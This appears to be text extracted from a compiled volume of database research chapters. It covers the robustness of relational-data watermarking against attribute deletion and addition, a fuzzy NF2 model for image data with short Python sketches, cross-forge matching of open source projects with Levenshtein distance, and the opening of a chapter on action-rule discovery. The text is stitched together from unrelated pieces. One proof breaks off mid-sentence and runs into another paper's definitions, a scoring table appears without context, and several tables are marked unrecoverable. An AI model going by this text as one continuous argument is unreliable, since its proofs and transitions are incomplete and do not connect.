Recall that the analysis of the tuple-based scheme is independent of the composition of the primary key; thus, it holds for the combination-based scheme as long as the virtual primary key has the same uniqueness property as the real primary key. In this section, we first extend the robustness analysis to attribute-related attacks and then study the impact of using the virtual primary key instead of the real primary key in the robustness analysis. Unless otherwise stated, our analysis applies to the combination-based scheme. A comparison of the combination-based scheme with the element-based scheme is given at the end.
Attribute Deletion and Addition

Assume that k out of ν attributes are selected for constructing the virtual primary key and that the k attributes are randomly distributed among the ν attributes from tuple to tuple. We analyze the false-miss rate of watermark detection when applied to marked data in which some attributes may be deleted or added. Our analysis is similar to that for a value modification attack, where the false-miss rate is measured in terms of the flipping probability pf. The flipping probability is the probability that each extracted watermark bit is not as expected. In the context of attribute deletion and addition, this probability is renamed the equivalent flipping probability p̂f. We study how to calculate p̂f in attribute deletion and addition attacks. As long as p̂f is obtained, the false-miss rate can be computed the same way as in a value modification attack (by replacing pf with p̂f).

Claim 5. If d out of ν attributes are deleted in a watermarked relation where the virtual primary key is constructed from k attributes, then the false-miss rate is

1 − ∏_{i=0}^{L−1} (1 − B(ωi/2; ωi, 1/2 − C(ν−d, k)/(2 C(ν, k)))),

where ωi > 0 is the number of times that watermark bit wi is extracted from the data.

Proof. An extracted bit is not as expected only if the virtual primary key is altered; that is, some of the k attributes that are involved in the construction of the virtual primary key are deleted. Since the k attributes are randomly distributed from tuple to tuple, the probability that the virtual primary key is altered is 1 − C(ν−d, k)/C(ν, k). It is equally likely that the altered virtual primary key leads to a correct or an incorrect bit being detected. Therefore,

p̂f = 1/2 − C(ν−d, k)/(2 C(ν, k)).

Note that the false-miss rate is computed based on the extracted times rather than the embedded times of each watermark bit. If the extracted times are unknown, they can be estimated as d/ν of the embedded times.
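The equivalent flipping probability of Claim 5 can be evaluated directly; a small sketch with illustrative parameters follows (ν = 10 attributes).

```python
from math import comb

def equiv_flip_prob(nu: int, k: int, d: int) -> float:
    """p_hat_f = 1/2 - C(nu-d, k) / (2 * C(nu, k)); zero when nothing is deleted."""
    surviving = comb(nu - d, k) if nu - d >= k else 0
    return 0.5 - surviving / (2 * comb(nu, k))

# the fewer attributes used for the virtual primary key, the smaller the impact of deletion
for k in (1, 3, 5):
    print(k, [round(equiv_flip_prob(nu=10, k=k, d=d), 3) for d in range(0, 6)])
```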
The false-miss rate in an attribute deletion attack is computed exactly as in a value modification attack, except that pf is replaced with p̂f. Figures 4 and 5 plot p̂f as a function of d and k, respectively. Figure 4 shows that the more attributes are deleted, the larger the equivalent flipping probability and the larger the false-miss rate. Figure 5 indicates that the fewer attributes are involved in the construction of the virtual primary key, the smaller the impact of attribute deletion. However, as will be shown in the next subsection, using fewer attributes in the construction of the virtual primary key will degrade the uniqueness property of the virtual primary key, which increases the false-miss rates against tuple-related attacks. Therefore, there is a trade-off between tuple-related attacks and attribute deletion in terms of the number of attributes in the virtual-primary-key construction. The optimal number can be decided by minimizing the overall false-miss rates in the evaluation of these attacks. Now consider attribute addition. We assume that all hash values HMAC(K, vpk(r.A)) are uniformly distributed from 0 to U, where U is the largest possible hash value.

Claim 6. If d > 0 attributes are added to a watermarked relation where the virtual primary
key is constructed from k out of ν attributes, then the false-miss rate is

1 − ∏_{i=0}^{L−1} (1 − B(ωi/2; ωi, 1/2 − (1/2)(1 − k/(ν+1))^d)),

where ωi > 0 is the number of times that watermark bit wi is extracted from the data.

Proof. For each tuple r where a watermark bit is embedded, k HMAC hash values h0,..., hk−1 are used for constructing the virtual primary key, where the k hash values are selected from {HMAC(K, vpk(r.Ai)): i = 0,…, ν−1} that are closest to 0. The watermark bit is embedded into the attribute whose hash value is the closest to 0. Now consider that one attribute Ax is added. The virtual primary key of tuple r is unaffected by the adding of Ax only if the hash value HMAC(K, vpk(r.Ax)) is greater than max_i h_i

in which each vsi is a set of elements of the form <vj, fj>. Here, vj is a value from the corresponding fuzzy domain Di, and fj is its corresponding fuzzy membership value.
For the sake of simplicity and readability, we denote those attribute value sets vsi that are singletons, and where the only member of the set has fuzzy membership degree equal to 1 (which represents full, certain membership), by means of the only domain value. This is the case, for example, for the Ves_pict.gif, Coast_pict.gif, Snow_pict.gif, and Sunset_pict.gif values of the File field in the data presented in Table 1. As we have already mentioned, we also consider as a special case the presence of a membership degree of 0. This represents certain nonmembership. In our model, the presence of pairs <v, 0> in an attribute value does not provide any information in addition to what we could have if we removed that pair from the set, since domain values that do not appear in an attribute value are implicitly associated with the membership degree 0. For example, the attribute values {<red, 0.5>} and {<red, 0.5>, <green, 0.0>} provide the same information. Thus, we assume that our attribute value sets do not contain any such pair. Since the fuzzy values are derived from data returned by some automatic vision systems, and since data provided by visual systems are only nonzero values (systems only give information
about feature values they find in the considered image), then this also is not a restriction from an implementation point of view.

FNF2 fuzzy relation schema. A fuzzy relation schema is used to associate attribute names to domains. In the following, we also use the term fuzzy attribute to denote an attribute A whose domain dom(A) is a fuzzy set. A fuzzy relational schema is defined as a symbol R, which is the name of the fuzzy relation, and a set X = {A1, …, An} of (names of) fuzzy attributes. The schema is denoted as R(X).

FNF2 fuzzy relation. A fuzzy relation is an instance of a fuzzy relation schema; that is, a fuzzy relation is a set of fuzzy tuples, as stated in the following definition. Let R({A1, A2,…, An}) be a relational schema. A fuzzy relation, defined over R, is a set of fuzzy tuples t = <vs1, …, vsn> such that each vsi is a fuzzy subset of dom(Ai). An example of a fuzzy relation has been given in Table 1. The schema of this example relation has four attributes: File, Color, Texture, and Content. Each attribute value is a set of value/degree pairs.
Manipulation of FNF2 Fuzzy Relations

FNF2 relations are accessed and manipulated by means of a corresponding FNF2 algebra. The usual set-theoretic operators can be extended to fuzzy sets in different ways, depending on the specific semantics associated with the fuzzy logical connectives. In fact, several semantics have been proposed for the fuzzy logical connectives and (∧) and or (∨), but it has been proved that the min-max semantics is the only semantics for conjunction and disjunction that preserves logical equivalences and satisfies the idempotency property (Yager, 1982).
This motivates our choice to adopt the following definitions for the fuzzy logical operators:

- Fuzzy intersection (and): A ∧ B = {<u, min(μA(u), μB(u))> | u ∈ U}
- Fuzzy union (or): A ∨ B = {<u, max(μA(u), μB(u))> | u ∈ U}
- Fuzzy complementation (not): ¬A = {<u, 1 − μA(u)> | u ∈ U}

In these definitions, U represents the universe (i.e., the domain against which fuzzy membership is evaluated). In this chapter, we do not present the details of the algebra. Instead, we concentrate on the primary aspects on which the FNF2 algebra is founded: (i) tuple comparison, which is the basis of all operations that would require some logical predicate on tuples to be evaluated; (ii) tuple combination, on which most algebraic operations rely for putting information together after identifying the relevant tuples to be combined; and (iii) tuple ordering, the basis of all operations having to do with ranking based on a given criterion.

Tuple comparison. Tuple comparison is the basis of several algebraic operations, including the set-oriented ones. In the FNF2 data model, attribute values are sets of pairs. Depending on the query, comparison either can involve the complete information represented by the tuples or can be restricted to a particular component. Indeed, it might be necessary to recognize and combine those tuples that contain, for every attribute in their schema, the same sets of values; these values might differ at most because of membership degrees. This notion is formalized in the definition of data-identical tuples. Let R({A1, A2,…, An}) be a relation schema and r be an instance of R. Let t1 = <vs11, …, vsn1> and t2 = <vs12, …, vsn2> denote two tuples of r. The tuples t1 and t2 are data identical iff for every index i, it holds that data1 = {u | <u, f> ∈ vsi1} = data2 = {u | <u, f> ∈ vsi2}. As an example, consider the tuples t1 and t2 in Table 2, which are data identical.

As the comparison operator, depending on the intended meaning of the query processing operations, either the more traditional equality or data identicalness can be used. Consider, for example, the set union operation. Union merges the tuples appearing in the given sets and removes duplicates. If equality is used as the comparison operator, then the resulting relation can contain multiple instances of data-identical tuples, which are not eliminated because of the different degrees of certainty of their attribute values. This could be the intended meaning if the operation has the goal of keeping track of all the data retrieved by the feature extraction modules. On the other hand, for applications that need to return a single certainty value for every feature data value in the result, the existence of data-identical tuples cannot be acceptable. Therefore, data-identical tuples should be combined. Similar considerations apply to the other set operators as well. In particular, intersection returns the tuples that are in common; therefore, it depends on the meaning associated with "being in common" and on the treatment chosen for data-identical (but distinct) tuples occurring in the relations being intersected. Similarly, set difference returns the tuples appearing in the first relation and not appearing in the second one; therefore, it also depends on the comparison operator chosen and on the treatment selected for data-identical tuples.
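Assuming an attribute value is represented as a dictionary from domain values to membership degrees, the min-max connectives and the data-identical test can be sketched as follows; this is an illustration of the definitions above, not the FNF2 implementation.

```python
def f_and(a: dict, b: dict) -> dict:
    # min semantics for fuzzy conjunction; pairs with degree 0 are dropped (see text)
    out = {u: min(a[u], b[u]) for u in set(a) & set(b)}
    return {u: d for u, d in out.items() if d > 0}

def f_or(a: dict, b: dict) -> dict:
    # max semantics for fuzzy disjunction
    return {u: max(a.get(u, 0.0), b.get(u, 0.0)) for u in set(a) | set(b)}

def f_not(a: dict, universe) -> dict:
    # complementation with respect to an explicit universe U
    return {u: 1.0 - a.get(u, 0.0) for u in universe}

def data_identical(t1: list, t2: list) -> bool:
    # tuples are lists of attribute values (dicts); compare domain values only
    return len(t1) == len(t2) and all(set(vs1) == set(vs2) for vs1, vs2 in zip(t1, t2))
```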
Tuple combination. Different alternative tuple combination functions can be defined, depending on the intended meaning of the union operation. In particular, if we want to adopt a skeptical treatment toward the combination results, we use conjunction as the combination function for data-identical tuples, while an optimistic treatment of combination would make disjunction preferable:

• Optimistic combination (⊕o): Let t1 = <vs11, …, vsn1> and t2 = <vs12, …, vsn2> be two data-identical tuples. Then t1 ⊕o t2 = <vs1, …, vsn>, where for each i, vsi = {<u, μ1(u)> ∨ <u, μ2(u)> | <u, μ1(u)> ∈ vsi1 and <u, μ2(u)> ∈ vsi2}.
• Skeptical combination (⊕s): Defined in the analogous way by applying the fuzzy and operator on the values instead of the fuzzy or: t1 ⊕s t2 = <vs1, …, vsn>, where for each i, vsi = {<u, μ1(u)> ∧ <u, μ2(u)> | <u, μ1(u)> ∈ vsi1 and <u, μ2(u)> ∈ vsi2}.
As an example, consider the two data-identical tuples, t1 and t2, introduced previously. Their optimistic and skeptical combinations are as shown in Table 3. Both optimistic and skeptical combinations are commutative and associative; they inherit these properties from the commutativity and associativity of fuzzy and and fuzzy or and from the standard set union. Therefore, the combination operators can be extended straightforwardly to sets of data-identical tuples.
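A sketch of the two combination operators over the same dictionary representation; the tuple values used in the example are hypothetical, since the actual degrees of Table 2 are not reproduced here.

```python
def f_or(a, b):   # max semantics (fuzzy or)
    return {u: max(a.get(u, 0.0), b.get(u, 0.0)) for u in set(a) | set(b)}

def f_and(a, b):  # min semantics (fuzzy and), dropping degree-0 pairs
    return {u: min(a[u], b[u]) for u in set(a) & set(b) if min(a[u], b[u]) > 0}

def combine_optimistic(t1, t2):
    """t1 (+)o t2 on data-identical tuples: fuzzy or, attribute value by attribute value."""
    return [f_or(vs1, vs2) for vs1, vs2 in zip(t1, t2)]

def combine_skeptical(t1, t2):
    """t1 (+)s t2: fuzzy and instead of fuzzy or."""
    return [f_and(vs1, vs2) for vs1, vs2 in zip(t1, t2)]

t1 = [{"Ves_pict.gif": 1.0}, {"red": 0.5, "blue": 0.2}, {"human": 0.95}]
t2 = [{"Ves_pict.gif": 1.0}, {"red": 0.3, "blue": 0.4}, {"human": 0.9}]
print(combine_optimistic(t1, t2))   # degrees: max per domain value
print(combine_skeptical(t1, t2))    # degrees: min per domain value
```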
Table 2. Example of data-identical tuples (schema: File, Color, Texture, Content). Both tuples t1 and t2 have File = Ves_pict.gif; their Color and Texture value sets contain the same domain values with different membership degrees (the individual pairs are not recoverable from the extracted text), and their Content values are {<human, 0.95>} for t1 and {<human, 0.9>} for t2.
Table 3. Optimistic and skeptical combinations t1 ⊕o t2 and t1 ⊕s t2 of the tuples in Table 2 (File = Ves_pict.gif; the combined Color, Texture, and Content value sets are not recoverable from the extracted text).
Comparing with constants: These conditions are defined on individual attribute values (i.e., a single set of value/degree pairs).

1. Fuzzy pair membership condition tests whether a given pair belongs to a given set. This condition generally is used to retrieve images with a specific feature value; for example, in any query such as "Find all images in the relation r in which the color red appears with certainty 0.8." Syntactically, this selection condition can be expressed as <red, 0.8> ∈ r.Color.
2. Fuzzy pair membership condition, restricted to data value, tests whether a pair with a specific data value belongs to a given attribute value. For example, this condition allows the retrieval of images in which some quantity of red is identified by the feature extraction module. This query could be expressed as <red, _> ∈ r.Color, where "_" is a wildcard.
3. Fuzzy pair membership condition, restricted to certainty value, tests whether a pair with a specific certainty value belongs to a given attribute value. For example, we might be interested in knowing if there is any color that has been recognized with certainty 0.9 in a given collection of pictures. This query can be written as <_, 0.9> ∈ r.Color.
4. Fuzzy pair membership condition, restricted to certainty value thresholds, tests whether there is any pair with a certainty value above a given threshold (or, similarly, below the threshold). Conditions of this sort allow users to retrieve those images whose data certainty values are above the threshold of interest for the specific application.
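Under the same dictionary representation of attribute values, the four membership conditions can be evaluated as simple predicates; the wildcard handling below is an assumption made for illustration.

```python
WILDCARD = "_"

def pair_in(value_set: dict, data, degree) -> bool:
    """Fuzzy pair membership conditions 1-3, with "_" as a wildcard (exact match otherwise)."""
    for u, f in value_set.items():
        if (data == WILDCARD or data == u) and (degree == WILDCARD or degree == f):
            return True
    return False

def degree_above(value_set: dict, data, threshold: float) -> bool:
    """Condition 4: some matching pair has a certainty degree above the threshold."""
    return any((data == WILDCARD or data == u) and f > threshold
               for u, f in value_set.items())

color = {"red": 0.8, "blue": 0.3}
print(pair_in(color, "red", 0.8))        # <red, 0.8> in r.Color
print(pair_in(color, "red", WILDCARD))   # <red, _> in r.Color
print(pair_in(color, WILDCARD, 0.9))     # <_, 0.9> in r.Color
print(degree_above(color, "red", 0.5))   # threshold condition
```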
Table 7. Trial four sample scoring table. Top of chart same as for Trial Two (URLs, names, ...); if score = 0, measure Levenshtein distance between names, giving +0.50 when the distance is within the similarity threshold; license matches, per token match, but only if score > 0. (The individual modifier values are not recoverable from the extracted text.)
The remaining token match attributes (programming languages and licenses) were only scored if the project pair already had some sort of positive correlation from one of the other three major attributes (URL, short name, or long name). This seemed to solve the problem of trivial token matching, and solved some of the problems of processing time. In Trial Three, we decided to explore solutions for the speed-of-processing issues caused by our massive Cartesian product generation (all projects in one forge times all projects in another forge). To do this, we considered what we know about how disjoint sets work (Sections 2.2 and 3.4.2). We decided to invert our program logic a bit: instead of building up a huge list of projects and comparing all projects in forge A against all projects in forge B, we instead attempt to identify likely sets immediately (or eliminate disjoint sets
immediately) and thus we can discount projects that are unlikely to be related. This serves to reduce the size of the sets being compared. For example, we built a list of projects that used Java on forge A and another list of projects that used Java on forge B, then only compared these projects along the other attributes. This method didn't actually reduce the number of comparisons, since every project had one or more programming languages, but it did serve to reduce the size of the in-memory hashes being built. In Trial Four we wanted to improve the accuracy of our partial name matches. We decided to use Levenshtein distances to measure the similarity between two tokens, such as between two short names. (In Trial One we had used simple regular expression-based partial string matches, so, for example, starfish and xstarfish would match but andychat and andyschat45 would not
match.) Levenshtein distances are calculated for each string pair based on the smallest number of characters that must be deleted, replaced, or inserted to make one string into another string. In our case, we chose to set an arbitrary threshold for similarity at 25%. The Levenshtein distance between andychat and andyschat45 is 3 (roughly 25% of the longest string), which is (barely) enough to warrant token matching in programming languages and license types according to our threshold of 25% or less.
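A small sketch of the Trial Four similarity test: a standard Levenshtein implementation plus the 25% threshold. This is illustrative and not the FLOSSmole code.

```python
def levenshtein(a: str, b: str) -> int:
    # smallest number of deletions, insertions, or replacements turning a into b
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def similar_enough(a: str, b: str, threshold: float = 0.25) -> bool:
    """Names are 'similar' if the edit distance is at most threshold * longest name."""
    return levenshtein(a, b) <= threshold * max(len(a), len(b))

print(levenshtein("andychat", "andyschat45"))      # 3
print(similar_enough("starfish", "xstarfish"))     # distance 1, well within threshold
```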
LIMITATIONS AND FUTURE WORK

Based on the experiments described in Section 4, entity matching is an interesting exercise, but it is certainly problematic. One of the most obvious problems is that the scoring modifiers given in Tables 4, 6, and 7 are completely arbitrary, based on trial and error and an intuitive sense of the data. In the case of Trial One, there is a distinct possibility that a pair of projects could achieve a score of 4.0 by having a partial non-dictionary name match (+.5), five attributes in common (+2.5), and a handful of well-chosen tokens in the textual description (+.5), and yet these projects could be completely unrelated. Tweaking the scores to reduce false positives and false negatives in this way is tedious and inefficient. In the subsequent trials, we attempted to reduce processing time and false positives/false negatives, but there are many other routes we could have taken to accomplish this. For instance, in the case of token matching, we look at the case of ant, for which there were very few singularly meaningful tokens in the textual descriptions, but the description as a whole matched perfectly. The use of dictionary word definitions for frequency matching may need to be refactored also. The ant match lost points because of this. We also recognize that open source developers and projects are a decidedly global population, and more languages than just English are used, so perhaps
English dictionary matching is an arbitrary solution. Would other dictionaries be effective? Should non-dictionary strings that are also common in software development ("lib", "db", "php") be added to the dictionary? Next, what about multi-way matches? We have given little attention to the problem (as presented in Howison et al., 2006) of how to merge multiple confidence scores after they've been created. Consider a project such as sqlite-ruby that appears on Sourceforge, Rubyforge, Freshmeat, and the FSF directory. What is the appropriate way to integrate its multiple scores? Sqlite-ruby is likely to have high scores on all 6 pair combinations, so a simple average might work, but what about a project like ant whose scores may vary more? Section 3 mentioned the possibility of matching projects based on the lists of developers on each project. Before doing this, it would be necessary to use similar entity matching methods to actually match developer entities as well. As is described in Robles and Gonzalez-Barahona (2005), matching developers also leads to a few additional complexities: "real" emails are most often not available for public lists of developers on code repositories; name matching with developers could be even more complex than matching on names for projects because of similarities in names and spellings; and, of course, developer privacy is always a concern when integrating personal data points. One final recommendation for future work is to remember some of the work being done on sites like Krugle, Ohloh, Swik, DOAPSpace, and the Galactic Project Registry to standardize the notion of a project name. Krugle is a source code search engine that actually uses some FLOSSmole data to populate its list of projects. Swik and Ohloh are user-driven directories of information about individual open source projects; Swik gets some of its initial information from FLOSSmole as well. DOAPSpace and the Galactic Project Registry are two different efforts to put together the DOAP (description of a project) metadata for
all open source projects. Each of these efforts probably would benefit from this discussion about entity matching and duplicate identification across repositories, and perhaps they can contribute to the conversation about the best way to achieve this goal.
REFERENCES

Batini, C., Lenzerini, M., & Navathe, S. (1986). A comparative analysis of methodologies for database schema integration. ACM Computing Surveys, 18(4), 323-364.

Bitton, D., & DeWitt, D. J. (1983). Duplicate record elimination in large data files. ACM Transactions on Database Systems (TODS), 8(2), 255-265.

Black, P. E. (Ed.). (2007). Levenshtein distance. In Dictionary of Algorithms and Data Structures [online]. U.S. National Institute of Standards and Technology. (Entry from Algorithms and Theory of Computation Handbook, CRC Press LLC, 1999.) Retrieved June 15, 2007, from http://www.nist.gov/dads/HTML/Levenshtein.html

Conklin, M. (2006). Beyond low-hanging fruit: Seeking the next generation of FLOSS data mining. In Proceedings of the 2nd International Conference on Open Source Systems (Como, Italy, June 2006) (pp. 47-56). New York: Springer.

Doan, A., Domingos, P., & Halevy, A. (2001). Reconciling schemas of disparate data sources: A machine learning approach. In Proceedings of the SIGMOD Conference (Santa Barbara, CA, USA) (pp. 509-520). New York: ACM Press.

Doan, A., Lu, Y., Lee, Y., & Han, J. (2003). Object matching for information integration: A profiler-based approach. In Proceedings of the IJCAI Workshop on Information Integration and the Web (Acapulco, Mexico) (pp. 53-58).

Garcia-Molina, H. (2006). Pair-wise entity resolution: Overview and challenges. In Proceedings of the 15th ACM International Conference on Information and Knowledge Management (CIKM '06) (Arlington, VA, USA, November 6-11, 2006) (p. 1). New York: ACM.

Hernandez, M. A., & Stolfo, S. J. (1995). The merge/purge problem for large databases. SIGMOD Record, 24(2), 127-138.

Howison, J., Conklin, M., & Crowston, K. (2005). OSSmole: A collaborative repository for FLOSS research data and analyses. In Proceedings of the 1st International Conference on Open Source Systems (Genova, Italy, June 2005) (pp. 54-59).

Levenshtein, V. I. (1966). Binary codes capable of correcting deletions, insertions, and reversals. Soviet Physics Doklady, 10, 707-710.

On, B.-W., Lee, D., Kang, J., & Mitra, P. (2005). Comparative study of name disambiguation problem using a scalable blocking-based framework. In Proceedings of the 5th ACM/IEEE-CS Joint Conference on Digital Libraries (Denver, CO, USA) (pp. 344-353).

Rahm, E., & Bernstein, P. (2001). A survey of approaches to automatic schema matching. The VLDB Journal, 10, 334-350.

Robles, G., & Gonzalez-Barahona, J. (2005). Developer identification methods for integrated data from various sources. In Proceedings of the Mining Software Repositories Workshop (MSR 2005) (St. Louis, MO, USA) (pp. 1-5).

Winkler, W. (1999). The state of record linkage and current research problems (Technical report). Statistical Research Division, U.S. Bureau of the Census.
This work was previously published in the International Journal of Open Source Software & Processes, edited by S. Koch, Volume 1, Issue 1, pp. 46-57, copyright 2009 by IGI Publishing, formerly known as Idea Group Publishing (an imprint of IGI Global).
Chapter 7.23
Extended Action Rule Discovery Based on Single Classification Rules and Reducts

Zbigniew W. Ras
University of North Carolina at Charlotte, USA

Elzbieta M. Wyrzykowska
University of Information Technology and Management, Poland
ABSTRACT

Action rules can be seen as logical terms describing knowledge about possible actions associated with objects that are hidden in a decision system. Classical strategy for discovering them from a database requires prior extraction of classification rules that next are evaluated, pair by pair, with a goal to build a strategy of action based on condition features, in order to get a desired effect on a decision feature. An actionable strategy is represented as a term r = [(ω) ∧ (α→β)] ⇒ [φ→ψ], where ω, α, β, φ, and ψ are descriptions of events. The term r states that when the fixed condition ω is satisfied and the changeable behavior (α→β) occurs in objects represented as tuples from a database, so does the expectation (φ→ψ). With each object, a number of actionable strategies can be associated, and
each one of them may lead to different expectations and thus to different reclassifications of objects. This chapter will focus on a new strategy of constructing action rules directly from single classification rules instead of pairs of classification rules. In this way, we gain not only in the simplicity of the method of action rule construction, but also in its time complexity. The chapter will present a modified tree-based strategy for constructing action rules, followed by a new simplified strategy for constructing them. Finally, these two strategies will be compared.
INTRODUCTION

There are two aspects of interestingness of rules that have been studied in the data mining literature, objective and subjective measures (Adomavicius
& Tuzhilin, 1997; Liu, Hsu, Chen, 1997; Silberschatz & Tuzhilin, 1995, 1996). Objective measures are data driven and domain independent. Generally, they evaluate the rules based on their quality and similarity between them. Subjective measures, including unexpectedness, novelty, and actionability, are user driven and domain dependent. The notion of an action rule, constructed from certain pairs of association rules, has been proposed in Ras and Wieczorkowska (2000). Its different definition was given earlier in Geffner and Wainer (1998). Also, interventions introduced in Greco, Matarazzo, Pappalardo, and Slowinski (2005) are conceptually very similar to action rules. Action rules have been investigated further in Tsay and Ras (2005, 2006), Tzacheva and Ras (2005), and Ras and Dardzinska (2006). To give an example justifying the need of action rules, let us assume that a number of customers have closed their accounts at one of the banks. We construct possibly the simplest description of that group of people and next search for a new description, similar to the one we have, with a goal to identify a new group of customers from which no one left that bank. If these descriptions have a form of rules, then they can be seen as actionable rules. Now, by comparing these two descriptions, we may find the cause why these accounts have been closed, and formulate an action that, if undertaken by the bank, may prevent other customers from closing their accounts. For example, an action rule may say that by inviting people from a certain group of customers for a glass of wine by the bank, it is almost guaranteed that these customers will not close their accounts and they do not move to another bank. Sending invitations by regular mail to all these customers, or inviting them personally by giving them a call, are examples of an action associated with that action rule. In Tzacheva and Ras (2005), the notion of a cost and feasibility of an action rule was introduced. The cost is a subjective measure and feasibility is an objective measure. Usually, a number of action
rules or chains of action rules can be applied to reclassify a certain set of objects. The cost associated with changes of values within one attribute is usually different from the cost associated with changes of values within another attribute. The strategy of replacing the initially extracted action rule by a composition of new action rules, dynamically built and leading to the same reclassification goal, was proposed in Tzacheva and Ras (2005). This composition of rules uniquely defines a new action rule. Objects supporting the new action rule also support the initial action rule, but the cost of reclassifying them is lower, or even much lower, for the new rule. In Ras and Dardzinska (2006), the authors propose a new simplified strategy for constructing action rules. In this chapter, we present an algebraic extension of this method and show the close correspondence between the rules generated by the tree-based strategy (Tsay & Ras, 2005) and the rules constructed by this newest method.
BACKGROUND

In the paper by Ras and Wieczorkowska (2000), the notion of an action rule was introduced. The main idea was to generate, from a database, special types of rules that basically form a hint to users, showing a way to reclassify objects with respect to some distinguished attribute (called a decision attribute). Values of some attributes used to describe objects stored in a database can be changed, and this change can be influenced and controlled by the user. However, some of these changes (for instance, "profit") cannot be done directly to a decision attribute. In such a case, definitions of this decision attribute in terms of other attributes (called classification attributes) have to be learned. These new definitions are used to construct action rules, showing what changes in values of some attributes for a given class of objects are needed to reclassify objects the way users want. But users may still be either unable
or unwilling to proceed with actions leading to such changes. In all such cases, we may search for definitions of values of any classification attribute listed in an action rule. By replacing a value of such an attribute by its definition, extracted either locally or at remote sites (if the system is distributed), we construct new action rules that might be of more interest to users than the initial rule (Tzacheva & Ras, 2005). We start with a definition of an information system given in Pawlak (1991). By an information system, we mean a pair S = (U, A), where:

1. U is a nonempty, finite set of objects (object identifiers), and
2. A is a nonempty, finite set of attributes; that is, a: U → Va for a ∈ A, where Va is called the domain of a.
Information systems can be seen as decision tables. In any decision table, together with the set of attributes, a partition of that set into conditions and decisions is given. Additionally, we assume that the set of conditions is partitioned into stable and flexible (Ras & Wieczorkowska, 2000). Attribute a ∈ A is called stable for the set U if its values, assigned to objects from U, cannot be changed in time; otherwise, it is called flexible. “Place of birth” is an example of a stable attribute. “Interest rate” on any customer account is an example of a flexible attribute. For simplicity reasons, we consider decision tables with only one decision. We adopt the following definition of a decision table: By a decision table, we mean an information system S = (U, ASt∪AFl ∪{d}), where d∉ASt ∪ AFl is a distinguished attribute called the decision. The elements of ASt are called stable conditions, whereas the elements of A Fl ∪{d} are called flexible. Our goal is to change values of attributes in AFl for some objects in U so the values of the attribute d for these objects may change as well. Certain relationships between attributes from
ASt ∪AFl and the attribute d will have to be discovered first. By Dom(r) we mean all attributes listed in the IF part of a rule r extracted from S. For example, if r = [ (a1,3)*(a2,4) → (d,3)] is a rule, then Dom(r) = {a1,a2}. By d(r) we denote the decision value of rule r. In our example d(r) = 3. If r1, r2 are rules and B ⊆ AFl∪ASt is a set of attributes, then r1/B = r2/B means that the conditional parts of rules r1, r2 restricted to attributes B are the same. For example if r1 = [(a1,3) → (d,3)], then r1/{a1} = r/{a1}. Assume also that (a, v → w) denotes the fact that the value of attribute a has been changed from v to w. Similarly, the term (a, v → w)(x) means that a(x)=v has been changed to a(x)=w; in other words, the property (a,v) of an object x has been changed to property (a,w). Assume now that rules r1, r2 have been extracted from S and r1/[Dom(r1)∩Dom(r2)∩ASt]= r2/[ Dom(r1)∩Dom(r2)∩ASt], d(r1)=k1, d(r2)=k2. Also, assume that (b1, b2,…, bp) is a list of all attributes in Dom(r1) ∩ Dom(r2) ∩ AFl on which r1, r2 differ and r1(b1)= v1, r1(b2)= v2,…, r1(bp)= vp, r2(b1)= w1, r2(b2)= w2,…, r2(bp)= wp. By (r1,r2)-action rule on x∈U we mean a statement r: [r2/ASt ∧ (b1, v1→ w1) ∧ (b2, v2 → w2) ∧…∧ (bp, vp → wp)](x) ⇒ [(d, k1 → k2)](x). Object x∈U supports action rule r, if x supports r1, (∀a∈Dom(r2) ∩ASt) [a(x) = r2(a)], (∀i≤p)[bi(x)=vi], and d(x)=k1. The set of all objects in U supporting r is denoted by U. To define an extended action rule (Ras & Tsay, 2003), let us assume that two classification rules are considered. We present them in Table 1 to better clarify the process of constructing extended action rules. Here, “St” means stable classification attribute and “Fl” means flexible one. In a classical representation, these two rules have a form:
Table 1.

a (St)   b (Fl)   c (St)   e (Fl)   g (St)   h (Fl)   d (Decision)
a1       b1       c1       e1                          d1
a1       b2                         g2       h2        d2

r1 = [a1 ∧ b1 ∧ c1 ∧ e1 → d1], r2 = [a1 ∧ b2 ∧ g2 ∧ h2 → d2].

It is easy to check that [[a1 ∧ g2 ∧ (b, b1 → b2)] ⇒ (d, d1 → d2)] is the (r1,r2)-action rule. Assume now that object x supports rule r1, which means that x is classified as d1. In order to reclassify x to class d2, we need to change its value of b from b1 to b2, but we also have to require that g(x) = g2 and that the value of h for object x be changed to h2. This is the meaning of the extended (r1,r2)-action rule r given next:

[[a1 ∧ g2 ∧ (b, b1 → b2) ∧ (h, → h2)] ⇒ (d, d1 → d2)].

Let us observe that this extended action rule can be replaced by a class of new action rules. First, we need to define a new relation ≈h on the set U as: x ≈h y iff h(x) = h(y), for any x, y ∈ U. Now, let us assume that Vh = {h1, h2, h3} and that Ui = {y ∈ U: h(y) = hi}, for i = 1, 2, 3, are the classes of U/≈h. The extended action rule r can be replaced by two action rules:

[[a1 ∧ g2 ∧ (b, b1 → b2) ∧ (h, h1 → h2)] ⇒ (d, d1 → d2)] with supporting set U1,
and [[a1 ∧ g2 ∧ (b, b1 → b2) ∧ (h, h3 → h2)] ⇒ (d, d1 → d2)] with supporting set U3. This example shows that extended action rules can be seen as generalizations of action rules. Also, it gives us a hint of how to look for the most compact representations of action rules.
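As a sketch of how an extended (r1,r2)-action rule could be assembled from two classification rules, assume rules are dictionaries of condition values plus a decision; the helper below is hypothetical and only mirrors the definition given above.

```python
def action_rule(r1: dict, r2: dict, stable: set):
    """Build the extended (r1,r2)-action rule if r1 and r2 agree on shared stable attributes."""
    cond1, d1 = r1["conditions"], r1["decision"]
    cond2, d2 = r2["conditions"], r2["decision"]
    shared_stable = set(cond1) & set(cond2) & stable
    if any(cond1[a] != cond2[a] for a in shared_stable):
        return None                     # rules contradict on stable attributes
    fixed = {a: v for a, v in cond2.items() if a in stable}          # r2 restricted to stable attributes
    changes = {a: (cond1[a], cond2[a])                               # flexible changes (b, b1 -> b2)
               for a in (set(cond1) & set(cond2)) - stable
               if cond1[a] != cond2[a]}
    required = {a: (None, cond2[a])                                  # extended part, e.g. (h, -> h2)
                for a in set(cond2) - set(cond1) - stable}
    return {"fixed": fixed, "changes": changes, "required": required,
            "effect": (d1, d2)}

r1 = {"conditions": {"a": "a1", "b": "b1", "c": "c1", "e": "e1"}, "decision": "d1"}
r2 = {"conditions": {"a": "a1", "b": "b2", "g": "g2", "h": "h2"}, "decision": "d2"}
print(action_rule(r1, r2, stable={"a", "c", "g"}))
```

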